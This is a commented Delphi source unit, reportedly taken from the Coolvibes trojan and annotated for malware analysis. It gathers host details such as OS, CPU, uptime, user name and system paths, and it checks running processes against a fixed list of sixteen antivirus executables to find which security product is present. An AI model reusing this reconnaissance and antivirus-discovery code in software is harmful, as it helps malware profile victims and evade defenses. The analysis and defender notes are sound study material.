📄 unitinformaciondelsistema.pas
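// Unit containing the functions used to collect information about the
// host PC. These functions are extracted from the Coolvibes trojan.
// Read it as malware-analysis material: the unit profiles the host (OS, CPU,
// uptime, user name, computer name, locale, system paths) and checks the
// running processes against a fixed list of antivirus process names.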
unit UnitInformacionDelSistema;
interface
uses
Windows,
SysUtils,
registry,
TLHelp32;
const
  // Parallel lookup tables: entry i of cadenaDeProcesos is the lower-case
  // executable name matched against running processes, and entry i of
  // nombreDeAvs is the product label reported for that match (see Scan).
  // For analysts: this fixed set of security-product process names appearing
  // together in a binary is a recognisable static trait of this routine.
  cadenaDeProcesos : array[0..15] of string = (
    'avesvc.exe',     // [0]  -> 'AntiVir'
    'ashdisp.exe',    // [1]  -> 'Avast Antivirus'
    'avgcc.exe',      // [2]  -> 'AVG Antivirus'
    'bdss.exe',       // [3]  -> 'BitDefender'
    'spider.exe',     // [4]  -> 'Dr.Web'
    'avp.exe',        // [5]  -> 'Kaspersky Antivirus'
    'nod32krn.exe',   // [6]  -> 'Nod32'
    'cclaw.exe',      // [7]  -> 'Norman'
    'dvpapi.exe',     // [8]  -> 'Authentium Antivirus'
    'ewidoctrl.exe',  // [9]  -> 'Ewido Security Suite'
    'mcshield.exe',   // [10] -> 'McAfee VirusScan'
    'pavfires.exe',   // [11] -> 'Panda Antivirus/Firewall'
    'almon.exe',      // [12] -> 'Sophos'
    'ccapp.exe',      // [13] -> 'Symantec/Norton'
    'pccntmon.exe',   // [14] -> 'PC-cillin Antivirus'
    'fssm32.exe'      // [15] -> 'F-Secure'
  );

  // Display names, index-aligned with cadenaDeProcesos above.
  nombreDeAvs : array[0..15] of string = (
    'AntiVir',
    'Avast Antivirus',
    'AVG Antivirus',
    'BitDefender',
    'Dr.Web',
    'Kaspersky Antivirus',
    'Nod32',
    'Norman',
    'Authentium Antivirus',
    'Ewido Security Suite',
    'McAfee VirusScan',
    'Panda Antivirus/Firewall',
    'Sophos',
    'Symantec/Norton',
    'PC-cillin Antivirus',
    'F-Secure'
  );
// Public interface of the unit. Each routine returns its result as a string.

// Reads the registry value `nombre` under `subkey` of the root key `key`.
function DameClave(key:Hkey; subkey,nombre:String):String;
// Returns a Windows version label derived from GetVersionEx, plus the
// service-pack string when one is present.
function DameElSistemaOperativo(): String;
// Returns the CPU name string read from the registry.
function DameLaCPU():String;
// Returns the time since boot formatted as '<d>d <h>h <m>m'.
function DameElTiempoActivo():String;
// Returns the name of the user the process runs as.
function DameElPutoUserName : String;
// Returns the computer name.
function DameElNameComputer : String;
// Returns the local date and time as text.
function DameDiaYHora: String;
// Returns the display name of the user's default language.
function IdiomaDelUsuario:string;
// Returns the Windows system directory path.
function GetSysDir: string;
// Returns the Windows directory path.
function GetWinDir: String;
// Returns the antivirus label found by Scan(1).
function KieroElAv(): string;
// Walks the process list; with Tipo = 1 it compares each executable name with
// cadenaDeProcesos and reports the matching nombreDeAvs label. No other Tipo
// value is handled by the implementation in this unit.
Function Scan(Tipo: integer): string;
// ASCII-only lower-casing. Declared here under the same name as
// SysUtils.LowerCase, so calls inside this unit resolve to this version.
Function LowerCase(Const S: String): String;
implementation
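// Reads one registry value and returns its data as a string.
//
//   key    - an open root key such as HKEY_LOCAL_MACHINE
//   subkey - path of the key below `key`
//   nombre - name of the value to read
//
// Returns '' when the key cannot be opened, the value does not exist, the
// value is empty, or the read fails. For REG_SZ / REG_EXPAND_SZ values the
// terminating NUL character(s) stored with the data are stripped; other value
// types are returned as raw bytes.
function DameClave(key:Hkey; subkey,nombre:String):String;
var
  regKey: HKEY;
  tipoValor: DWORD;
  bytesRead: DWORD;
  valor: String;
begin
  Result := '';
  // Stop if the key cannot be opened: without this check the queries and the
  // close below would run on an uninitialised handle.
  if RegOpenKeyEx(key, PChar(subkey), 0, KEY_READ, regKey) <> ERROR_SUCCESS then
    Exit;
  try
    // First call passes no buffer: it only reports the value type and the
    // size of the data in bytes.
    bytesRead := 0;
    if RegQueryValueEx(regKey, PChar(nombre), nil, @tipoValor, nil, @bytesRead) <> ERROR_SUCCESS then
      Exit;
    // An empty value would make valor[1] below refer to a non-existent
    // character.
    if bytesRead = 0 then
      Exit;
    // bytesRead is in bytes; size the string in characters, rounding up, so
    // the buffer is large enough whatever SizeOf(Char) is.
    SetLength(valor, (bytesRead + SizeOf(Char) - 1) div SizeOf(Char));
    if RegQueryValueEx(regKey, PChar(nombre), nil, nil, @valor[1], @bytesRead) <> ERROR_SUCCESS then
      Exit;
    // The value may have shrunk between the two calls; keep only what was read.
    SetLength(valor, (bytesRead + SizeOf(Char) - 1) div SizeOf(Char));
    // String data is stored with its terminator; do not hand it to the caller.
    if (tipoValor = REG_SZ) or (tipoValor = REG_EXPAND_SZ) then
      while (Length(valor) > 0) and (valor[Length(valor)] = #0) do
        SetLength(valor, Length(valor) - 1);
    Result := valor;
  finally
    // Runs on every exit path once the key has been opened.
    RegCloseKey(regKey);
  end;
end;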
// Maps the version numbers reported by GetVersionEx to a Windows product
// label and appends the service-pack string (szCSDVersion) when it is set.
// Returns 'Desconocido' ("unknown") for any combination not listed below.
// The table ends at major version 6, which is always labelled
// 'Windows Vista' whatever the minor version is.
function DameElSistemaOperativo(): String;
var
  info: TOSVersionInfo;
  etiqueta: String;
begin
  etiqueta := 'Desconocido';
  // The API requires the structure size to be filled in before the call.
  info.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
  GetVersionEx(info);

  if info.dwPlatformId = VER_PLATFORM_WIN32_NT then
  begin
    // NT family: the major version decides, major 5 is split by minor version.
    if info.dwMajorVersion = 4 then
      etiqueta := 'Windows NT 4.0'
    else if info.dwMajorVersion = 5 then
    begin
      if info.dwMinorVersion = 0 then
        etiqueta := 'Windows 2000'
      else if info.dwMinorVersion = 1 then
        etiqueta := 'Windows XP'
      else if info.dwMinorVersion = 2 then
        etiqueta := 'Windows Server 2003';
    end
    else if info.dwMajorVersion = 6 then
      etiqueta := 'Windows Vista';
  end
  else if info.dwPlatformId = VER_PLATFORM_WIN32_WINDOWS then
  begin
    // Windows 9x family: only the minor version is inspected.
    if info.dwMinorVersion = 0 then
      etiqueta := 'Windows 95'
    else if info.dwMinorVersion = 10 then
      etiqueta := 'Windows 98'
    else if info.dwMinorVersion = 90 then
      etiqueta := 'Windows Me';
  end;

  // Service-pack text, appended after a single space when present.
  if info.szCSDVersion <> '' then
    etiqueta := etiqueta + ' ' + info.szCSDVersion;

  Result := etiqueta;
end;
// Returns the processor name stored in the registry for CPU 0, read through
// DameClave and trimmed.
function DameLaCPU():String;
const
  CLAVE_CPU = 'HARDWARE\DESCRIPTION\System\CentralProcessor\0';
  VALOR_NOMBRE = 'ProcessorNameString';
var
  nombreCpu: String;
begin
  nombreCpu := DameClave(HKEY_LOCAL_MACHINE, CLAVE_CPU, VALOR_NOMBRE);
  // Trim removes the spaces before and after the string,
  // e.g. " CPU p6 2000 " becomes "CPU p6 2000".
  Result := Trim(nombreCpu);
end;
// Formats the time since boot as '<days>d <hours>h <minutes>m'.
// The source is GetTickCount, a 32-bit millisecond counter, so the reported
// uptime starts again from zero when that counter wraps (after about 49.7
// days).
function DameElTiempoActivo():String;
const
  MS_POR_MINUTO = 1000 * 60;
  MS_POR_HORA = 1000 * 60 * 60;
  MS_POR_DIA = 1000 * 60 * 60 * 24;
var
  ticks, dias, horas, minutos: Cardinal;
begin
  ticks := GetTickCount();
  // Whole days, then the hours left inside the last day, then the minutes
  // left inside the last hour.
  dias := ticks div MS_POR_DIA;
  horas := (ticks mod MS_POR_DIA) div MS_POR_HORA;
  minutos := (ticks mod MS_POR_HORA) div MS_POR_MINUTO;
  Result := IntToStr(dias) + 'd ' + IntToStr(horas) + 'h ' + IntToStr(minutos) + 'm';
end;
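// Returns the name of the user the current process runs as, or '' when
// GetUserName fails.
//
// Changes from the earlier version:
//  - Result is initialised, so a failed call no longer returns whatever the
//    result variable held before.
//  - The buffer is sized for the longest user name Windows allows (UNLEN,
//    256 characters) instead of 20 characters plus terminator.
//  - The buffer is a character array, so its size is counted in characters,
//    which is the unit GetUserName expects.
function DameElPutoUserName : String;
const
  MAX_NOMBRE_USUARIO = 256; // UNLEN in the Windows SDK header lmcons.h
var
  buf: array[0..MAX_NOMBRE_USUARIO] of Char;
  tam: DWORD;
begin
  Result := '';
  // Size in characters, including room for the terminating NUL.
  tam := Length(buf);
  if Windows.GetUserName(buf, tam) then
    Result := buf;
end;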
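// Returns the computer name reported by GetComputerName, or '' when the call
// fails.
//
// Changes from the earlier version:
//  - Result is initialised, so a failed call no longer returns whatever the
//    result variable held before.
//  - The buffer is a character array of MAX_COMPUTERNAME_LENGTH + 1 elements,
//    so its size is counted in characters, which is the unit the API expects.
function DameElNameComputer : String;
var
  buf: array[0..MAX_COMPUTERNAME_LENGTH] of Char;
  tam: DWORD;
begin
  Result := '';
  // Size in characters, including room for the terminating NUL.
  tam := MAX_COMPUTERNAME_LENGTH + 1;
  if Windows.GetComputerName(buf, tam) then
    Result := buf;
end;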
// Returns the current local date and time as text, in the format
// DateTimeToStr produces.
function DameDiaYHora: String;
var
  ahora: TSystemTime;
  comoFecha: TDateTime;
begin
  // Local (not UTC) wall-clock time from the Windows API.
  Windows.GetLocalTime(ahora);
  comoFecha := SystemTimeToDateTime(ahora);
  Result := DateTimeToStr(comoFecha);
end;
// Returns the display name of the user's default language: the identifier
// from GetUserDefaultLangID is turned into text by VerLanguageName.
function IdiomaDelUsuario:string;
var
  nombreIdioma: array [0..100] of char;
begin
  // The buffer holds 101 characters; 100 is passed as its size. The return
  // value of VerLanguageName is not inspected.
  VerLanguageName(GetUserDefaultLangID, nombreIdioma, 100);
  Result := nombreIdioma;
end;
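// Returns the Windows system directory, or '' when it cannot be obtained.
//
// Changes from the earlier version:
//  - The buffer holds MAX_PATH characters plus terminator instead of a fixed
//    144 bytes.
//  - The return value of GetSystemDirectory is checked. On failure (0) or
//    when the buffer is too small (a value not below the buffer size) the
//    buffer is not read, so no uninitialised memory is converted to a string.
//  - A stack array replaces GetMem/FreeMem, so nothing can leak.
function GetSysDir: string;
var
  buf: array[0..MAX_PATH] of Char;
  copiados: UINT;
begin
  Result := '';
  copiados := GetSystemDirectory(buf, Length(buf));
  if (copiados > 0) and (copiados < UINT(Length(buf))) then
    Result := buf;
end;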
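// Returns the Windows directory, or '' when it cannot be obtained.
//
// Changes from the earlier version:
//  - The buffer holds MAX_PATH characters plus terminator instead of a fixed
//    144 bytes.
//  - The return value of GetWindowsDirectory is checked. On failure (0) or
//    when the buffer is too small (a value not below the buffer size) the
//    buffer is not read, so no uninitialised memory is converted to a string.
//  - A stack array replaces GetMem/FreeMem, so nothing can leak.
function GetWinDir: String;
var
  buf: array[0..MAX_PATH] of Char;
  copiados: UINT;
begin
  Result := '';
  copiados := GetWindowsDirectory(buf, Length(buf));
  if (copiados > 0) and (copiados < UINT(Length(buf))) then
    Result := buf;
end;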
// Returns the antivirus label reported by Scan for check type 1, the only
// type Scan handles.
function KieroElAv(): string;
const
  TIPO_ANTIVIRUS = 1;
var
  etiqueta: string;
begin
  etiqueta := Scan(TIPO_ANTIVIRUS);
  Result := etiqueta;
end;
// Walks a ToolHelp snapshot of the running processes and, when tipo = 1,
// compares each lower-cased executable name with cadenaDeProcesos.
//
// Behaviour as written:
//  - A match assigns nombreDeAvs[i] + CRLF to the result, replacing any
//    earlier match, so at most one label is returned: the one for the last
//    matching process in snapshot order.
//  - The trailing CRLF is removed before returning; with no match the result
//    is ''.
//  - For any other tipo the process list is still walked but nothing is
//    compared.
//  - The snapshot handle is not validated before use.
//
// For defenders: enumerating processes to look for security products is the
// behaviour catalogued as Security Software Discovery (MITRE ATT&CK T1518.001).
Function Scan(tipo: integer): string;
var
  instantanea: THandle;
  entrada: TProcessEntry32;
  hayMas: Boolean;
  idx: integer;
  encontrado: string;
begin
  encontrado := '';
  instantanea := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS or TH32CS_SNAPMODULE, 0);
  // The API requires dwSize to be set before the first Process32First call.
  entrada.dwSize := SizeOf(entrada);
  hayMas := Process32First(instantanea, entrada);
  while hayMas do
  begin
    if tipo = 1 then
      for idx := Low(cadenaDeProcesos) to High(cadenaDeProcesos) do
        if LowerCase(entrada.szExeFile) = cadenaDeProcesos[idx] then
          encontrado := nombreDeAvs[idx] + #13#10;
    hayMas := Process32Next(instantanea, entrada);
  end;
  CloseHandle(instantanea);
  // Drops the final CRLF; leaves an empty string unchanged.
  Delete(encontrado, Length(encontrado) - 1, 2);
  Result := encontrado;
end;
// Converts upper-case letters to lower case.
// Only the ASCII letters 'A'..'Z' are changed (by adding 32 to the character
// code); every other character, accented letters included, is copied as is.
function LowerCase(const S: string): string;
var
  pos: integer;
  actual: char;
begin
  SetLength(Result, Length(S));
  for pos := 1 to Length(S) do
  begin
    actual := S[pos];
    if (actual >= 'A') and (actual <= 'Z') then
      actual := Chr(Ord(actual) + 32);
    Result[pos] := actual;
  end;
end;
end.